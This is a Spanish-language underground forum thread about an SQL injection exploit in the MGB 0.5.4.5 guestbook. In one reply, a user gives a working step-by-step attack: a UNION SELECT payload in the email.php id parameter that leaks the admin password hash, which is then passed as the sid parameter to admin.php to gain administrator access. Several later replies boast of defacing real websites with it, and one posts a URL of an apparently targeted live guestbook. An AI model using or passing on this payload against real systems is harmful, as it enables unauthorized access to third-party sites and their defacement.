Nuevas NORMAS para el foro
Bienvenido(a),
Visitante
. Favor de
ingresar
o
registrarse
.
¿Perdiste tu
email de activación?
- Agosto 21, 2008, 04:34:59
Boton Buscar
Visita:
Articulos
-
Juegos Gratis
-
Da Foros
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderador:
OzX
) | Tema:
Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
0 Usuarios y 1 Visitante están viendo este tema.
« anterior
próximo »
Páginas:
[
1
]
Autor
Tema: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX (Leído 1765 veces)
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2061
foro.new-bytes.net
Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
en:
Enero 19, 2007, 02:20:26 »
En línea
http://foro.new-bytes.net
Elros Yavetil
Miembro
Desconectado
Mensajes: 39
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #1 en:
Marzo 15, 2007, 12:31:39 »
dice que window lo reconcoe como comando interno el perl :S
«
Última modificación: Marzo 15, 2007, 12:54:12 por Elros Yavetil
»
En línea
r.u.b.i.o
Habitual
Desconectado
Mensajes: 344
Rahma Naoarak O'al
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #2 en:
Marzo 15, 2007, 02:42:58 »
Cita de: Elros Yavetil en Marzo 15, 2007, 12:31:39
dice que window lo reconcoe como comando interno el perl :S
XD tenes que tener instalado el
Active Perl
para interpretar xD, o sino doy otra alternativa para usar esta sql inyection :
Una vez que encuentran una pagina vulnerable, vas a donde dice CONTACT.
EN la barra de direcciones, podemos ver un tal "email.php?id=admin" , eso lo reemplazamos por "email.php?id=1%20UNION%20SELECT%20null,passwort%20FROM%20mgb_settings%20--" SIN COMILLAS y le damos enter...
EN la pagina q se abre. podemos distinguir que cambio de lo que antes decia "Write an email to Admin" a "Write an email to c68485e252b120534397e32099101d63"
Este es el resultado de la SQL Inyection ... ese codigo lo copian..
En la barra de direcciones, borramos todo desde email.php , escribimos esto: admin.php?sid=<aca pegamos el codigo>
Nos quedaria asi:
Código:
http://<url>/<directorio del foro>/admin.php?sid=<codigo del sql inyection>
LISTO , le damos enter y ya estamos como admins...
En línea
Elros Yavetil
Miembro
Desconectado
Mensajes: 39
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #3 en:
Marzo 15, 2007, 03:37:00 »
gracias... ya me va!!!! HICE MI PRIMER DEFACINGGG weee....
gracias por ayudarme, ya soy feliz...
ojala hubiese manuales cm estos... WOWOWOWO!!!:D
En línea
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2061
foro.new-bytes.net
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #4 en:
Marzo 15, 2007, 03:41:43 »
En línea
http://foro.new-bytes.net
Elros Yavetil
Miembro
Desconectado
Mensajes: 39
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #5 en:
Marzo 15, 2007, 03:54:27 »
En línea
maber
Miembro
Desconectado
Mensajes: 20
La vida no tiene sentido,hay que darselo
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #6 en:
Marzo 18, 2007, 03:38:35 »
me gusta me gusta
En línea
SokalT
Miembro
Desconectado
Mensajes: 36
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #7 en:
Marzo 25, 2007, 03:57:44 »
Yay alfin me salio desfacear me tardo mucho porke no sabia manejar el cmd pero lo hice y defacie como 5 paginas
En línea
rody216
Miembro
Desconectado
Mensajes: 20
excelente muy bien
«
Respuesta #8 en:
Marzo 25, 2007, 09:02:26 »
me pongo a practicar para aprender thanks bye
En línea
~Rik~Style~
Habitual
Desconectado
Mensajes: 308
La Vida Es Facil Toma Decisiones Y No Mires Atras
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #9 en:
Mayo 27, 2007, 07:13:49 »
http://rasilion.ra.funpic.de/Gaestebuch/guestbook.php
Jajajaja Gracias Ozx
Muy Buen manual Como Siempre Te Lo Curras :p Ke Seria De Nosotros Sin Ti
Salu2
~Rik~Style~
En línea
ek_col
Visitante
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #10 en:
Agosto 16, 2007, 11:17:37 »
TENIA QUE SER OZX
Ya me acostumbre a ver que siempre sacas buenos post......buenos?...nooo...buenisimos, creeme que esta info la estaba buscando y lo que encotraba me confundia mas, ahora entiendo, gracias.
Seria genial que las personas compartieran mas con el foro.
En línea
.bAcKdOoR.
Recien Llegado
Desconectado
Mensajes: 5
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #11 en:
Enero 11, 2008, 07:11:21 »
wena ozx!
oie compile y too..
pero al cargar me sale
connected y too el atao..
y al final.
Exploit Failed!
ke onda¿
= trate con la otra forma mediante "contacto" me dio el hash pero al "guarda cambios"
y lo logre...
Gracias1
«
Última modificación: Enero 11, 2008, 07:26:22 por .bAcKdOoR.
»
En línea
Chile =)
Black_Jack21
Recien Llegado
Desconectado
Mensajes: 15
H4ck 15 5h4r3 1nf0rm4t10n
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #12 en:
Junio 08, 2008, 08:55:58 »
exelente articulo
En línea
Flori4n
Recien Llegado
Desconectado
Mensajes: 2
Re: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
«
Respuesta #13 en:
Junio 18, 2008, 06:58:00 »
merci
En línea
Páginas:
[
1
]
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderador:
OzX
) | Tema:
Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
Foros De Consulta General
-----------------------------
=> Novedades
=> Dudas, Comentarios Y Sugerencias
=> Top 100
=> Off-Topic
=> Revista E-Zine
===> Noticias
-----------------------------
Phreaking, Hacking y Seguridad
-----------------------------
=> HacK GeneraL
===> Ingenieria Inversa
===> Encriptacion, Cryptografia
===> TV HACK
===> Seguridad
===> Cursos y Ezines
=====> Trucos Internet
=====> Textos Hacking
===> Defacing
=> Phreaking
===> Moviles
=> Bug y Exploits
-----------------------------
Hack Novato
-----------------------------
=> Hack para newbies
=> Todo Messenger
=> Troyanos y virus
-----------------------------
Sistemas Operativos
-----------------------------
=> Windows y otros sistemas operativos no libres
===> Problemas Tecnicos Windows
=> Sistemas operativos libres.
===> GNU/Linux
===> Manuales y Tutoriales
===> Descargas
-----------------------------
Programacion
-----------------------------
=> Programación
===> Programación Basica
===> Otros Lenguajes
===> Visual Basic y Net
===> ASM
===> Programacion Shell
===> Perl
===> Carbide C/C#/C++
===> Batch
===> SQL
=> Programacion para webmasters
===> Consultas
===> Php
===> Html
===> Java - Java Script
===> Php Nuke
===> Scripts Pre-Fabricados
===> Mysql
===> CSS y Diseño Web
-----------------------------
Artes Graficas
-----------------------------
=> Diseño Grafico
===> Battle Arts
===> Flash
===> Tutoriales
===> Galerías
===> Software
-----------------------------
Area Tecnica
-----------------------------
=> Networking & Wireless
=> Overclocking, Refrigeracion y demas
=> Hardware
===> Cursos Y manuales
=> Electronica Y Robotica
-----------------------------
Programas
-----------------------------
=> Software
===> Configuraciones de software
===> Pedidos de software
=> Cracks & Serialz
=> P2p, Bittorrent, Elinks
-----------------------------
Multimedia Y Divx
-----------------------------
=> Juegos PC Y Consolas
===> Dudas ayudas y comentarios de juegos
===> Pedidos de juegos
=> Mp3
=> Multimedia
=> Peliculas Divx
-----------------------------
Entretenimiento Y sitios de interes
-----------------------------
=> Juegos, Humor y Adultos. (Diversión)
===> Adultos
=> Paginas Webs Recomendadas
=> Videos
Powered by SMF 1.1.5
|
SMF © 2006-2007, Simple Machines LLC
Loading...